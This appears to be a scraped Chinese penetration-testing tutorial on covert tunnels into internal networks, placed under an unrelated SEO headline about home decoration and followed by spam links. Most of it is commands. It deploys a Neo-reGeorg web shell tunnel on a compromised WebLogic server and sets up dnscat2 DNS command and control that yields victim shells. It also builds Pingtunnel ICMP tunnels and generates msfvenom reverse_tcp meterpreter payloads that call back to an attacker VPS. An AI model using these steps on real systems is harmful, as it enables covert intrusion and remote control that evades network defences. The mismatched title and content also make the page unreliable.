当前位置: 首页 > news >正文

室内装修设计资质家居seo整站优化方案

室内装修设计资质,家居seo整站优化方案,做网站个体户执照,网站的数据库在哪里本文仅限于安全研究和学习#xff0c;用户承担因使用此工具而导致的所有法律和相关责任#xff01; 作者不承担任何法律和相关责任#xff01; HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目#xff0c;目的是#xff1a; 提高可用性#xff0…       本文仅限于安全研究和学习用户承担因使用此工具而导致的所有法律和相关责任 作者不承担任何法律和相关责任 HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目目的是 提高可用性避免特征检测 提高 tunnel 连接安全性 提高传输内容保密性 应对更多的网络环境场景下使用 靶场环境cve-2017-10271  weblogic #靶场攻击过程使用脚本工具得到shell在此略过 1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器 2.使用蚁剑上传JSP文件 上传至此目录可以访问到文件 /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ 3.使用 neoreg.py 连接WEB服务器在本地建立 socks 代理代理默认端口 1080 修改配置文件vim proxychains4.conf 执行命令 #测试代理 proxychains curl 127.0.0.1:7001 DNS隧道 Dnscat2 dnscat2是一个DNS隧道工具通过DNS协议创建加密的命令和控制通道它的一大 特色就是服务端会有一个命令行控制台所有的指令都可以在该控制台内完成。包 括文件上传、下载、反弹Shell。 直连模式客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。 中继模式像我们平时上网一样DNS解析先经过互联网的迭代解析最后指向我们 的恶意DNS服务器。相比直连速度较慢但是更安全。 服务端安装 apt install ruby ruby-dev git make g ruby-bundler gem install bundler git clone https://github.com/iagox86/dnscat2.git也可以先下载文件然后上传至VPS cd dnscat2/server bundle install   #如此命令报错和本地网络有关多试几次 客户端编译 Linux git clone https://github.com/iagox86/dnscat2.git   cd dnscat2/client/ make   Windows 下载Windows版本 在本地编译上传 上传已经编译好的 .exe程序 make编译之后会在此目录下生成一个dnscat可执行二进制文件。 Linux systemd-resolve占用53端口的解决方法 https://www.itren.org/319.html Dnscat2直连模式 启动服务端 ruby ./dnscat2.rb 启动客户端 vps收到会话 help windows 进入session 1: session -i 1 shell    #获取主机shell 进入session 2 : session -i 2 执行命令 whoami 直连模式流量特征:tcpdump udp dst port 53 Dnscat2中继模式 环境准备  1. 一台公网CC服务器       2. 一台内网靶机              #以win7为例 3. 一个可配置解析的域名 配置DNS域名解析 创建A记录将自己的域名解析服务器ns.hack.com指向云服务器VPS IP A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx 创建NS记录将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com NS解析是在告诉域名系统想要知道 dns.hack.com 的IP地址就去问ns.hacker.com  vps防火墙设置开放全部UDP端口 启动服务端 ruby ./dnscat2.rb dns.xxx.xxx --secretabcd secret --指定密码 启动客户端 server #指定VPS地址 服务端收到session 3 获取shell 进入会话session -i 4 执行命令 whoami ICMP隧道 Pingtunnel ICMP隧道       通过某种信道获取了内网主机的shell但是当前信道不适合做远控的通信信道 tcp 和 udp 等传输层协议不能出网 dns 、 http 等应用层协议也不能出网只有 icmp 协议可以出网。 目的上线仅icmp协议出网的内网主机 ICMP隧道转发TCP上线MSF 1.VPS启动ICMP隧道服务端 ./pingtunnel -type server -noprint 1 -nolog 1 2.靶机启动ICMP隧道客户端 pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1 3. MSF 生成反弹 shell 的 payload 上传到靶机 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost127.0.0.1 lport9999 -f exe hot.exe 4.执行 payload 反弹 shell 到 MSF 设置侦听 msfconsole use exploit/multi/handler set lhost xx.xx.xx.xx   (vps的内网IP) set lport 8866 set payload windows/x64/meterpreter/reverse_tcp exploit 5. 靶机执行payload,msf上线 ICMP隧道转发Socks上线MSF 1. VPS启动ICMP隧道服务端 ./pingtunnel -type server -noprint 1 -nolog 1 2.靶机启动ICMP隧道客户端 pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1 #  icmp隧道客户端监听127.0.0.1:9999启动socks5服务     通过连接到VPS IP的icmp隧道     由icmpserver转发socks5代理请求到目的地址 VPSIP:8899 3.MSF 生成反弹 shell 的 payload 上传到靶机并执行 msfvenom -p windows/x64/meterpreter/reverse_tcp lhostVPSIP lport8866 HttpProxyTypeSOCKS HttpProxyHost127.0.0.1 HttpProxyPort9999 -f exe c2.exe 5.设置侦听 handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866 #IP是vps的内网IP 6.MSF收到会话 可以执行命令 参考 内网渗透之内网穿透 - 先知社区 ...
http://www.hkea.cn/news/14266578/

相关文章:

  • 重庆荣昌网站建设报价网站建设在国内外有何趋势
  • 长沙大的建网站公司绿化面积 建设网站
  • 校友网站建设方案wordpress去掉页眉
  • 北京卓天下网站建设公司在什么网站能帮人做ppt
  • 网站服务器租赁你的知识宝库wordpress无法添加小工具
  • 免费python在线网站广州旅游景点
  • 济南外贸建站wordpress 显示多媒体
  • 为了同学都能访问网站如何做设计制作中国第一架飞机
  • 广西南宁网站推广wordpress xsind
  • 上海网站推广大全网站制作常见的问题
  • dede电影网站一个网站只有一个核心关键词
  • 网站备案是先做网站还是做完了备案招商网站建设公司
  • c++做网站上海网站开发网站开发公司
  • 建设购物网站wordpress网站重定向
  • 安宁市建设厅网站设计工作室图片
  • 外贸门户网站crm系统哪种品牌的好
  • p2p网站开发多少钱网站空间 哪个公司好
  • 南海最新消息seo的方法
  • 建设网站的目的服装类移动互联网开发的数据有限但更新快
  • 网站seo新手什么是优化问题
  • 常州制作企业网站深圳h5开发
  • 龙岗网站建设设计服务做网站的项目介绍
  • 哈尔滨市建设工程信息网官方网站河南搜索引擎优化
  • 广东建设银行招聘网站重庆微网站制作
  • wordpress 底部导航菜单重庆seo排名优化费用
  • 十堰建设银行官方网站标书制作图片
  • 建设工程新工艺网站安徽网站优化多少钱
  • 广州网站建设推广公司国内优秀网页
  • 深圳筑造建设有限公司网站wordpress 简繁体 插件
  • 网站建设费用:做个网站要多少钱?一鸿建设设计网站